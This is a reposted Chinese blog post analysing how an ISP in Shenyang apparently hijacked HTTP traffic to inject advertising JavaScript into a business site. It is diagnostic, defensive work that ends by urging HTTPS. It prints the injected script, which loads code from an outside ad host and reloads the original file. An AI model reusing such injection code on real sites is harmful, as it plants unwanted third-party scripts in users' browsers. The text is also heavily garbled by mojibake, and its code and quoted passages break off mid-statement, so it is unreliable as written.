摘要:最近業(yè)務(wù)系統(tǒng)經(jīng)常受到前端報(bào)錯(cuò)郵件發(fā)現(xiàn)大量的為沈陽(yáng)聯(lián)通客戶(hù)初步推斷為運(yùn)營(yíng)商劫持經(jīng)過(guò)現(xiàn)場(chǎng)排查發(fā)現(xiàn)出錯(cuò)畫(huà)面部分加載出錯(cuò)區(qū)別在于錯(cuò)誤的會(huì)先插入一個(gè)廣告為區(qū)別是否劫持查看面板正確并且為我方服務(wù)器確認(rèn)并非為攻擊。
編者按:Fundebug的客戶(hù)通過(guò)分析我們提供的報(bào)警信息����,定位了一個(gè)非常棘手的問(wèn)題—ISP劫持http請(qǐng)求。他的分析過(guò)程非常有意思�,同時(shí)也提醒我們,應(yīng)該及時(shí)支持HTTPS來(lái)保證站點(diǎn)安全���。
原文: ISP劫持http請(qǐng)求
作者: Mr_Qi
本文版權(quán)歸原作者Mr_Qi所有�。
最近業(yè)務(wù)系統(tǒng)經(jīng)常受到前端報(bào)錯(cuò)郵件
發(fā)現(xiàn)大量的ip為沈陽(yáng)聯(lián)通客戶(hù)==>初步推斷為運(yùn)營(yíng)商http劫持
經(jīng)過(guò)現(xiàn)場(chǎng)排查發(fā)現(xiàn)出錯(cuò)畫(huà)面部分js加載出錯(cuò)
區(qū)別在于錯(cuò)誤的js會(huì)先插入一個(gè)廣告js
為區(qū)別是否dns劫持查看NetWork面板
IP正確并且為我方服務(wù)器IP確認(rèn)并非為DNS攻擊���。
由于大面積出現(xiàn)沈陽(yáng)聯(lián)通問(wèn)題��,(故而考慮應(yīng)當(dāng)為運(yùn)營(yíng)商問(wèn)題�?應(yīng)該不會(huì)出現(xiàn)大范圍路由器被黑的可能吧)
返回js如下
(function () {
try {
var o = "m-_-m",
D = document;
if (!D.getElementById(o)) {
var j = "http://yunxiu.f6car.com/kzf6/js/basic/XXX.js",
J = j + (~j.indexOf("?") ? "&" : "?") + new Date().getTime(),
M = "http://pc.quansj.cn/?cid=08",
C = D.currentScript,
H = D.getElementsByTagName("head")[0],
N = function (s, i) {
var I = D.createElement("script");
I.type = "text/JavaScript";
if (i) I.id = i;
I.src = s;
H.appendChild(I);
};
if (self == top) {
N(M, o);
}
if (!C) {
C = (function () {
var S = D.scripts,
l = S.length,
i = 0;
for (; i < l; ++i) {
if (S[i].src === j) {
return S[i];
}
}
})();
}
C && ((C.defer || C.async) ? N(J) : D.write("
發(fā)現(xiàn)旗下域名
有好幾個(gè)都是廣告劫持網(wǎng)站
貌似和一個(gè)說(shuō)脫口秀的(趙本山徒弟)同名………………該不是同一個(gè)人吧/(ㄒoㄒ)/~~
和沈陽(yáng)聯(lián)通溝通后無(wú)果����,拒不承認(rèn)存在劫持。目前正在求助工信部��,不知能否有解決方案���。
github上已經(jīng)有針對(duì)該地址的adblock了……明顯遼寧聯(lián)通
看了一下js選項(xiàng)�����,正常情況下會(huì)執(zhí)行到
C&&((C.defer||C.async)?N(J):D.write("
具體說(shuō)明如下
With this data in mind, Chrome, starting with version 55, intervenes on behalf of all users when we detect this known-bad pattern by changing how document.write() is handled in Chrome (See Chrome Status). Specifically Chrome will not execute the
果然當(dāng)時(shí)客戶(hù)的請(qǐng)求了commonjs����,也就是commonjs也被劫持了。此刻畫(huà)面中出現(xiàn)了m-_-m節(jié)點(diǎn)����。導(dǎo)致其他被劫持的js不會(huì)加載真實(shí)的js………………
再說(shuō)一下關(guān)于我們首頁(yè)的劫持(跳轉(zhuǎn)�����?)
明顯也是江蘇寬帶(南京電信)的劫持……
歡迎加入我們Fundebug的全棧BUG監(jiān)控交流群: 622902485��。
文章版權(quán)歸作者所有���,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為����,您可以聯(lián)系管理員刪除����。
轉(zhuǎn)載請(qǐng)注明本文地址:http://m.hztianpu.com/yun/83066.html
